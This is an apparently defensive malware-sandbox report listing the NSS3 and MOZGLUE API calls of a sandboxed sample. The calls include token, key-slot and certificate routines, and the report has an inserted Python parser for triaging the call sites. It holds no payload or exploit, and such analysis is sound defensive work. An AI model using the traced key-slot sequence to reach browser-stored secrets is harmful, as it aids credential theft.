                                                                                                                                                                                                                          • API String ID: 284873373-0
                                                                                                                                                                                                                          • Opcode ID: 8139b48b1f2fc905f96385cdd5b14ad866a0951d1c01acdd5acca26b74c533dd
                                                                                                                                                                                                                          • Instruction ID: eca3eb02c99a94bbb6204d35a1e1de17acbb75dc241f2a793b920156daec475d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8139b48b1f2fc905f96385cdd5b14ad866a0951d1c01acdd5acca26b74c533dd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C21E139A026259BE700EA28DC44FAAB3B4FF05359F450128ED0967F42E731B964CBE0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C4C3440: PK11_GetAllTokens.NSS3 ref: 6C4C3481
                                                                                                                                                                                                                            • Part of subcall function 6C4C3440: PR_SetError.NSS3(00000000,00000000), ref: 6C4C34A3
                                                                                                                                                                                                                            • Part of subcall function 6C4C3440: TlsGetValue.KERNEL32 ref: 6C4C352E
                                                                                                                                                                                                                            • Part of subcall function 6C4C3440: EnterCriticalSection.KERNEL32(?), ref: 6C4C3542
                                                                                                                                                                                                                            • Part of subcall function 6C4C3440: PR_Unlock.NSS3(?), ref: 6C4C355B
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C4AE80C,00000000,00000000,?,?,?,?,6C4B8C5B,-00000001), ref: 6C4C3FA1
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C4AE80C,00000000,00000000,?,?,?,?,6C4B8C5B,-00000001), ref: 6C4C3FBA
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,00000000,00000000,00000000,?,6C4AE80C,00000000,00000000,?,?,?,?,6C4B8C5B,-00000001), ref: 6C4C3FFE
                                                                                                                                                                                                                          • PR_SetError.NSS3 ref: 6C4C401A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue$K11_Tokens
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3021504977-0
                                                                                                                                                                                                                          • Opcode ID: 493220cfc02ca15205e787e755885febee032f4574e451a6b7e700347fa14eef
                                                                                                                                                                                                                          • Instruction ID: 6f825fac5de1b7182bc1fd0c7ae4d7a303302ef0a0fdc6bcad4874fd80e537d6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 493220cfc02ca15205e787e755885febee032f4574e451a6b7e700347fa14eef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39314174604704CFD710EF69D584ABABBF0BF85355F01592DD8898BB10EB30E985CB96
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C4BB60F,00000000), ref: 6C4B5003
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C4BB60F,00000000), ref: 6C4B501C
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C4BB60F,00000000), ref: 6C4B504B
                                                                                                                                                                                                                          • free.MOZGLUE(?,00000000,00000000,00000000,?,6C4BB60F,00000000), ref: 6C4B5064
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterSectionUnlockValuefree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1112172411-0
                                                                                                                                                                                                                          • Opcode ID: 649b1c55063d5d591ecdb53fc65da74d71276e4bb65e5543d92fb2ee069cb280
                                                                                                                                                                                                                          • Instruction ID: 0e770dfa2f12cdbb82abe8eb44a789e3d1ae6e29b783663b52bea516ff2a5d51
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 649b1c55063d5d591ecdb53fc65da74d71276e4bb65e5543d92fb2ee069cb280
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC3129B4A05A06CFDB00EF68C484A6AFBF4FF09305B11852DD859AB700E730E990CBE5
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?,6C4DA71A,FFFFFFFF,?,?), ref: 6C4D9FAB
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,?,?,00000000,6C4DA71A,6C4DA71A,00000000), ref: 6C4D9FD9
                                                                                                                                                                                                                            • Part of subcall function 6C4D1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D136A
                                                                                                                                                                                                                            • Part of subcall function 6C4D1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D137E
                                                                                                                                                                                                                            • Part of subcall function 6C4D1340: PL_ArenaGrow.NSS3(?,6C46F599,?,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?), ref: 6C4D13CF
                                                                                                                                                                                                                            • Part of subcall function 6C4D1340: PR_Unlock.NSS3(?,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D145C
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,6C4DA71A,6C4DA71A,00000000), ref: 6C4DA009
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,6C4DA71A,6C4DA71A,00000000), ref: 6C4DA045
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Arena$Util$CriticalEnterSectionUnlockValue$Alloc_ErrorGrowGrow_Mark_
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3535121653-0
                                                                                                                                                                                                                          • Opcode ID: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
                                                                                                                                                                                                                          • Instruction ID: 8425838ad69e089eda853244e045d771052dcc8f8327902db9dde1aba6c1a556
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E2171B56012069BF700EF55DC60F66B7A9BF8536DF118128982987B81EB76F814CBD0
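The function blocks above all follow the same layout: an "APIs" list of call sites (API name, exporting module, observed arguments, and the "ref:" virtual address of the call), then a "Memory Dump Source" line whose "Offset:" is the base the module was mapped at in the sandbox run (6C3F0000 here, with the calls resolving into NSS3 and MOZGLUE exports). Sandbox addresses are only useful once converted to module-relative offsets, and a long report is easier to triage once the call sites are grouped by module. The parser below is an added example written for this page, not Joe Sandbox code; its sample input is a constructed subset of the entries in this section, and the regular expressions are an assumption about the report layout (they tolerate both the raw bullet lines and the cleaned form shown above).

```python
"""Parse the 'APIs' and 'Memory Dump Source' entries of a Joe Sandbox
disassembly section, convert call-site VAs to module RVAs, and group the
observed calls by exporting module.  Added example, not sandbox code."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample: a handful of lines copied in the shape of this report.
SAMPLE = """\
APIs
• TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C4BB60F,00000000), ref: 6C4B5003
• EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C4BB60F,00000000), ref: 6C4B501C
• PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C4BB60F,00000000), ref: 6C4B504B
• free.MOZGLUE(?,00000000,00000000,00000000,?,6C4BB60F,00000000), ref: 6C4B5064
  • Part of subcall function 6C4C3440: PK11_GetAllTokens.NSS3 ref: 6C4C3481
  • Part of subcall function 6C4C3440: PR_SetError.NSS3(00000000,00000000), ref: 6C4C34A3
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
"""

# Assumed line layout (matches the entries in this report):
#   [• ][Part of subcall function <VA>: ]<Api>.<MODULE>[(<args>)][,] ref: <VA>
API_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
SRC_RE = re.compile(r"Source File:\s*(?P<dump>\S+),\s*Offset:\s*(?P<base>[0-9A-Fa-f]+)")


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                        # VA of the call site in the sandbox run
    args: List[str]                 # '?' means the argument was not recovered
    caller: Optional[int] = None    # set when listed as 'Part of subcall function'
    rva: Optional[int] = None       # ref minus module base, once the base is known


def parse_section(text: str) -> Tuple[Optional[int], List[ApiCall]]:
    """Return (module base, call sites) for one function block of the report."""
    base: Optional[int] = None
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = SRC_RE.search(line)
        if m:
            base = int(m.group("base"), 16)
            continue
        m = API_RE.match(line)
        if not m:
            continue
        args = [a for a in (m.group("args") or "").split(",") if a != ""]
        calls.append(ApiCall(
            api=m.group("api"), module=m.group("mod"),
            ref=int(m.group("ref"), 16), args=args,
            caller=int(m.group("caller"), 16) if m.group("caller") else None,
        ))
    if base is not None:
        for c in calls:
            c.rva = c.ref - base  # module-relative offset, comparable across runs
    return base, calls


def apis_by_module(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """Distinct API names per exporting module, e.g. {'NSS3': [...], ...}."""
    out: Dict[str, set] = {}
    for c in calls:
        out.setdefault(c.module, set()).add(c.api)
    return {mod: sorted(names) for mod, names in out.items()}


def format_call(c: ApiCall, module_name: str = "nss3") -> str:
    """One triage line: '<module>+0x<rva>: Api.MODULE(args)'."""
    where = f"{module_name}+0x{c.rva:X}" if c.rva is not None else f"0x{c.ref:X}"
    sub = f" (via sub 0x{c.caller:X})" if c.caller is not None else ""
    return f"{where}: {c.api}.{c.module}({','.join(c.args)}){sub}"


if __name__ == "__main__":
    base, calls = parse_section(SAMPLE)
    print(f"module base: 0x{base:X}")
    for c in calls:
        print(format_call(c))
    print(apis_by_module(calls))
```

Run as-is it prints each call site as `nss3+0xC5003: TlsGetValue.KERNEL32(...)` and the per-module summary; the RVAs can then be looked up in the matching on-disk nss3.dll, and the module grouping makes the NSS3/MOZGLUE calls stand out from the plain KERNEL32 locking pattern (TlsGetValue, EnterCriticalSection, PR_Unlock) that repeats in every block.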
APIs
• PORT_ArenaMark_Util.NSS3(?), ref: 6C4E2E08
  • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
  • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
  • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
• PORT_NewArena_Util.NSS3(00000400), ref: 6C4E2E1C
• PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C4E2E3B
• PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4E2E95
  • Part of subcall function 6C4D1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D1228
  • Part of subcall function 6C4D1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C4D1238
  • Part of subcall function 6C4D1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D124B
  • Part of subcall function 6C4D1200: PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0,00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D125D
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C4D126F
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C4D1280
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C4D128E
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C4D129A
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C4D12A1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1441289343-0
                                                                                                                                                                                                                          • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                                          • Instruction ID: db37b749ccf335026cdda39b06fe42a99d5733a928bc73a4707bcf05351ba9d1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 422129B1D003564BE720DF589D44FAA3764AF9531EF170369DD085B742FBB1E58882D2
APIs
• TlsGetValue.KERNEL32 ref: 6C4B18A6
• EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,6C496C34,?,?,00000001,00000000,00000007,?), ref: 6C4B18B6
• PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C496C34,?,?), ref: 6C4B18E1
• PR_SetError.NSS3(00000000,00000000), ref: 6C4B18F9
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: CriticalEnterErrorSectionUnlockValue
• String ID:
• API String ID: 284873373-0
• Opcode ID: f987da2f63de5998e3127dcb2e470f421c8a3891a9d7696b8bf906405fc382e8
• Instruction ID: 1b7ec62d1ca0d751c32356fe7e194ce269c52e05a632b13e545b1c02817d04ef
• Opcode Fuzzy Hash: f987da2f63de5998e3127dcb2e470f421c8a3891a9d7696b8bf906405fc382e8
• Instruction Fuzzy Hash: 8E21D075E002199BEB00AF68DC45EEA7B74FF0A318F450168ED156B701E735AA28CBE0
APIs
• CERT_NewCertList.NSS3 ref: 6C49ACC2
  • Part of subcall function 6C472F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C472F0A
  • Part of subcall function 6C472F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C472F1D
  • Part of subcall function 6C472AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C470A1B,00000000), ref: 6C472AF0
  • Part of subcall function 6C472AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C472B11
• CERT_DestroyCertList.NSS3(00000000), ref: 6C49AD5E
  • Part of subcall function 6C4B57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C47B41E,00000000,00000000,?,00000000,?,6C47B41E,00000000,00000000,00000001,?), ref: 6C4B57E0
  • Part of subcall function 6C4B57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C4B5843
• CERT_DestroyCertList.NSS3(?), ref: 6C49AD36
  • Part of subcall function 6C472F50: CERT_DestroyCertificate.NSS3(?), ref: 6C472F65
  • Part of subcall function 6C472F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C472F83
• free.MOZGLUE(?), ref: 6C49AD4F
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
• String ID:
• API String ID: 132756963-0
• Opcode ID: 0457ce4e57142a9ef1761bbb5582145521990fc87b97518428d1cd43c54ec76a
• Instruction ID: 216b9bdbf2bd8b829428258310e61daee8ca15baa1920273d374bd8b2e8f88e4
• Opcode Fuzzy Hash: 0457ce4e57142a9ef1761bbb5582145521990fc87b97518428d1cd43c54ec76a
• Instruction Fuzzy Hash: E521C3B1D002248BEB20DF64D805DEEBBB4EF05209F064168D8057B711FB31AA49CBE5
APIs
• TlsGetValue.KERNEL32 ref: 6C4C3C9E
• EnterCriticalSection.KERNEL32(?), ref: 6C4C3CAE
• PR_Unlock.NSS3(?), ref: 6C4C3CEA
• PR_SetError.NSS3(00000000,00000000), ref: 6C4C3D02
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: CriticalEnterErrorSectionUnlockValue
• String ID:
• API String ID: 284873373-0
• Opcode ID: ea2cab9b82ba03b39a8fe8d42fbaab79ebc8ed2b99ad52fc8082de9a7b961d6d
• Instruction ID: 713f123f296bef2ac9a171d58b6da8e77c609a7faadb66fff2e3bf512eb84974
• Opcode Fuzzy Hash: ea2cab9b82ba03b39a8fe8d42fbaab79ebc8ed2b99ad52fc8082de9a7b961d6d
• Instruction Fuzzy Hash: C1119D7AA00214AFEB00EF24DC48E9A3778EF09369F554164EC088B722E731ED448AE1
APIs
• PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C4CF0AD,6C4CF150,?,6C4CF150,?,?,?), ref: 6C4CECBA
  • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
  • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
  • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
• PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C4CECD1
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
  • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C4CED02
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D116E
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C4CED5A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2957673229-0
                                                                                                                                                                                                                          • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                          • Instruction ID: ba24e346a56770f5158f28d17e0e854b17caa69535ec9ecc7cfb7bf940d60bd1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C72101B5A017829BE300CF21D984F52B7E4BFA4309F26C21AE80C87B61EB70E594C6D1
APIs
• PK11_IsLoggedIn.NSS3(?,?), ref: 6C49C890
  • Part of subcall function 6C498F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FAF
  • Part of subcall function 6C498F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FD1
  • Part of subcall function 6C498F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FFA
  • Part of subcall function 6C498F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499013
  • Part of subcall function 6C498F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499042
  • Part of subcall function 6C498F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C49905A
  • Part of subcall function 6C498F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499073
